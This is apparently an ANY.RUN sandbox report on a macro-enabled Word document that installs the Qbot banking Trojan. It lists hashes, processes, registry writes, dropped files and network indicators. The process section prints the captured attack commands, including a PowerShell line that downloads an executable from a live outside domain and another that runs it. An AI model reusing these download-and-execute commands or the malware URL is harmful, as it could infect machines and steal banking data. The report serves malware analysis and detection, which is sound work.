analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

103_1.doc

Full analysis: https://app.any.run/tasks/f71e10ba-dbac-4109-894a-fee84f76cab3
Verdict: Malicious activity
Threats:

Qbot is a banking Trojan — a malware designed to collect banking information from victims. Qbot targets organizations mostly in the US. It is equipped with various sophisticated evasion and info-stealing functions and worm-like functionality, and a strong persistence mechanism.

Analysis date: October 10, 2019, 12:36:08
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
qbot
trojan
maldoc-3
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

0248698A84AAA0A8E35C85A10E572E7B

SHA1:

111FC5557F71DF41F6BF5BE7BAB3C94156697305

SHA256:

F623BBEEEA89387F78FAF0F39FC1D2F082EEE57683929657D652326FFB06D4D2

SSDEEP:

6144:YeHJBKC3WqnzVSFHcVxz3r4JtEz2i+ze/K:YePh3WmzVz4jEzVE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2308)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2308)
    • Executes PowerShell scripts

      • cmd.exe (PID: 1748)
      • cmd.exe (PID: 3328)
    • Application was dropped or rewritten from another process

      • Gerilax.exe (PID: 2552)
      • Gerilax.exe (PID: 2580)
      • ytfovlym.exe (PID: 4072)
      • ytfovlym.exe (PID: 2576)
    • QBOT was detected

      • Gerilax.exe (PID: 2580)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 2156)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2968)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2968)
      • powershell.exe (PID: 520)
      • Gerilax.exe (PID: 2580)
    • Application launched itself

      • Gerilax.exe (PID: 2580)
      • ytfovlym.exe (PID: 4072)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2968)
      • Gerilax.exe (PID: 2580)
      • cmd.exe (PID: 2156)
    • Starts itself from another location

      • Gerilax.exe (PID: 2580)
    • Starts CMD.EXE for commands execution

      • Gerilax.exe (PID: 2580)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2308)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2308)
    • Dropped object may contain Bitcoin addresses

      • cmd.exe (PID: 2156)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docm | Word Microsoft Office Open XML Format document (with Macro) (53.6)
.docx | Word Microsoft Office Open XML Format document (24.2)
.zip | Open Packaging Conventions container (18)
.zip | ZIP compressed archive (4.1)

EXIF

XMP

Description: -
Creator: -

XML

ModifyDate: 2019:10:08 15:29:00Z
CreateDate: 2019:10:04 06:50:00Z
RevisionNumber: 83
LastModifiedBy: Пользователь Windows
AppVersion: 14
HyperlinksChanged: No
SharedDoc: No
CharactersWithSpaces: 41
LinksUpToDate: No
Company: -
Manager: Poligraph
TitlesOfParts:
HeadingPairs:
  • Название
  • 1
  • Title
  • 1
ScaleCrop: No
Paragraphs: 1
Lines: 1
DocSecurity: None
Application: Microsoft Office Word
Characters: 36
Words: 6
Pages: 1
TotalEditTime: 1.1 days
Template: Normal.dotm

ZIP

ZipFileName: [Content_Types].xml
ZipUncompressedSize: 1747
ZipCompressedSize: 464
ZipCRC: 0xd8a131a1
ZipModifyDate: 1980:01:01 00:00:00
ZipCompression: Deflated
ZipBitFlag: 0x0006
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
12
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs powershell.exe no specs #QBOT gerilax.exe gerilax.exe no specs ytfovlym.exe no specs cmd.exe ping.exe no specs ytfovlym.exe no specs explorer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2308"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\103_1.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
1748cmd /c c:\Helperes\HerttipoldbhrtnZFzdgg5474565746346.batC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2968powershell -Command (New-Object Net.WebClient).DownloadFile('http://adaptivecontentdevelopment.com/content/08C18A99C61C04B26A11115E910E2691/godz/4fzas.exe', 'c:\Helperes\Gerilax.exe')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3328cmd /c c:\Helperes\BJKGJGyfyghu675785674786.batC:\Windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
520powershell Start-Process -FilePath c:\Helperes\Gerilax.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2580"C:\Helperes\Gerilax.exe" C:\Helperes\Gerilax.exe
powershell.exe
User:
admin
Company:
Helios Software Solutions
Integrity Level:
MEDIUM
Description:
TextPad
Exit code:
0
Version:
4.5
Modules
Images
c:\helperes\gerilax.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
2552C:\Helperes\Gerilax.exe /CC:\Helperes\Gerilax.exeGerilax.exe
User:
admin
Company:
Helios Software Solutions
Integrity Level:
MEDIUM
Description:
TextPad
Exit code:
0
Version:
4.5
Modules
Images
c:\helperes\gerilax.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
4072C:\Users\admin\AppData\Roaming\Microsoft\Zulycjadyc\ytfovlym.exeC:\Users\admin\AppData\Roaming\Microsoft\Zulycjadyc\ytfovlym.exeGerilax.exe
User:
admin
Company:
Helios Software Solutions
Integrity Level:
MEDIUM
Description:
TextPad
Exit code:
0
Version:
4.5
Modules
Images
c:\users\admin\appdata\roaming\microsoft\zulycjadyc\ytfovlym.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
2156"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Helperes\Gerilax.exe"C:\Windows\System32\cmd.exe
Gerilax.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
4008ping.exe -n 6 127.0.0.1 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ping.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
Total events
2 502
Read events
1 403
Write events
1 023
Delete events
76

Modification events

(PID) Process:(2308) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:vqb
Value:
7671620004090000010000000000000000000000
(PID) Process:(2308) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2308) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(2308) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(2308) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(2308) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(2308) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(2308) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(2308) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
(PID) Process:(2308) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1330249790
Executable files
3
Suspicious files
7
Text files
2
Unknown types
2

Dropped files

PID
Process
Filename
Type
2308WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA9F6.tmp.cvr
MD5:
SHA256:
2968powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\131X6EWF1XV1YUSSHSOE.temp
MD5:
SHA256:
520powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VLVGAYUPQX9FE1FJAGC5.temp
MD5:
SHA256:
2308WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFB02626B021E69BCA.TMP
MD5:
SHA256:
2308WINWORD.EXEC:\Helperes\HerttipoldbhrtnZFzdgg5474565746346.battext
MD5:604B635D50B55C3E39D5ED3580D389FB
SHA256:334BFAD8E0AAF7DB4AD768DD38C2B9F3CCA9E1D2FAF31E8F4F4454E5FA635B63
2308WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$103_1.docpgc
MD5:D6B9E403FC7D219E1F52B31A71BAF792
SHA256:8FE5A52D1D0A64E0C5E7FE1D93B25F053BEEDA4226258C0ACEE824ACBBDEBB0E
2308WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D3E45E9E34C71A48C10FD945E9620BAF
SHA256:6CC7603DD408465CD9F4E0ED479443E49C34BDBCC43DE9FD1A9A1A1B8185537F
2308WINWORD.EXEC:\Helperes\BJKGJGyfyghu675785674786.battext
MD5:A1BCAC0E58AB980D5A6544C31117AAB6
SHA256:E3FADB1688D51F71D058930330482B3A0F90D54966B22DCADAD0201A99F46E0F
2968powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39d079.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
520powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39e327.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2968
powershell.exe
GET
200
166.62.28.102:80
http://adaptivecontentdevelopment.com/content/08C18A99C61C04B26A11115E910E2691/godz/4fzas.exe
US
executable
749 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2968
powershell.exe
166.62.28.102:80
adaptivecontentdevelopment.com
GoDaddy.com, LLC
US
suspicious

DNS requests

Domain
IP
Reputation
adaptivecontentdevelopment.com
  • 166.62.28.102
suspicious

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info